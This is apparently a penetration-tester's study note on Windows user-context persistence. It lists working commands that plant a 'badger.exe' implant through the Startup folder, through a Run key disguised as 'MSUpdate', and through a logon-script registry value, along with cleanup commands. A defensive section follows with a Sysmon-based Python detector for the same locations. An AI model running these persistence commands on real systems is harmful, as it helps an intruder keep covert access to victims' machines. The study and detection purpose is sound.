Why it matters in practice
Persistence matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps persistence tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through persistence.
- Persistence
- User context
- Persistence via startup folder
- Persistence via startup folder delete
- Persistence via registry run keys
- Persistence via registry run keys delete
- Persistence via logon scripts
- Logon.bat
- Persistence via logon scripts delete
- Persistence via shortcut modification
copy c:\tools\badger.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\badger.exe"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d c:\tools\badger.exe /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /f
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "c:\tools\logon.bat" /t REG_SZ /f
@ECHO OFF
C:\tools\badger.exe
reg delete "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /f
wscript c:\tools\makelnk.vbs
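The same three autostart locations seen from the detection side, as an added example that is not part of the original note. It assumes Sysmon-style events (Event ID 13 for a registry value set, Event ID 11 for a file create) already parsed into dicts; the sample events, SID, user name and trusted-path heuristic are constructed for illustration.

```python
import re

# Per-user autostart locations from this page. Sysmon reports HKCU as HKU\<SID>.
REG_RULES = [
    ("run_key", re.compile(
        r"^HKU\\[^\\]+\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)),
    ("logon_script", re.compile(
        r"^HKU\\[^\\]+\\Environment\\UserInitMprLogonScript$", re.I)),
]
STARTUP_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+$", re.I)
# Triage heuristic (assumption): payloads outside these roots deserve a closer look.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def classify(event):
    """Return a finding dict for a persistence-relevant event, else None."""
    if event.get("EventID") == 13:            # Sysmon: registry value set
        target, payload = event.get("TargetObject", ""), event.get("Details", "")
        technique = next((n for n, rx in REG_RULES if rx.search(target)), None)
    elif event.get("EventID") == 11:          # Sysmon: file created
        target = payload = event.get("TargetFilename", "")
        technique = "startup_folder" if STARTUP_RE.search(target) else None
    else:
        return None
    if technique is None:
        return None
    path = payload.strip().strip('"').lower()
    return {"technique": technique, "artifact": target, "payload": payload,
            "untrusted_path": not path.startswith(TRUSTED_ROOTS)}

def triage(events):
    """Keep only the events that touch a monitored autostart location."""
    return [f for f in map(classify, events) if f]

# Constructed sample events (not real telemetry); SID and user name are made up.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"EventID": 13, "Details": r"c:\tools\badger.exe",
     "TargetObject": "HKU\\" + SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\MSUpdate"},
    {"EventID": 13, "Details": r"c:\tools\logon.bat",
     "TargetObject": "HKU\\" + SID + r"\Environment\UserInitMprLogonScript"},
    {"EventID": 11, "TargetFilename":
     r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\badger.exe"},
    {"EventID": 13, "Details": r"%USERPROFILE%\AppData\Local\Temp",
     "TargetObject": "HKU\\" + SID + r"\Environment\TEMP"},   # benign: not flagged
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

A file written to the Startup folder is always reported with `untrusted_path` set, since that folder sits inside the user profile; shortcut changes made outside the Startup folder are not covered by these rules.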
Selected public references
- Nmap Reference Guide: nmap.org/book/man.html
- BloodHound Documentation: bloodhound.specterops.io/
- GitHub · fortra / Impacket: github.com/fortra/impacket
- MITRE ATT&CK: attack.mitre.org/
